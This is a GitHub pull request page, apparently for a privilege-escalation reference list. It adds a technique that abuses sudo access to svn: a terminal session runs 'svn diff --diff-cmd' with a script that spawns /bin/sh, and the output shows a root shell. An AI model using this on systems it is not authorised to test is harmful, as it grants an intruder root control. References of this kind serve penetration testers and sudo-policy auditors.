Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Add svn #483

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Add svn #483

wants to merge 1 commit into from

Conversation

Frissi0n
Copy link

lowpriv@7dc99421ba84:/tmp/working$         TD=$(mktemp -d)
        svnadmin create $TD/pwn
        svn checkout file:///$TD/pwn $TD/project
        echo -e '#!/bin/bash\n/bin/sh' > $TD/shell
        chmod +x $TD/shell
        sudo svn diff --diff-cmd "$TD/shell"
Checked out revision 0.
Index: c
===================================================================
# id
uid=0(root) gid=0(root) groups=0(root)

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant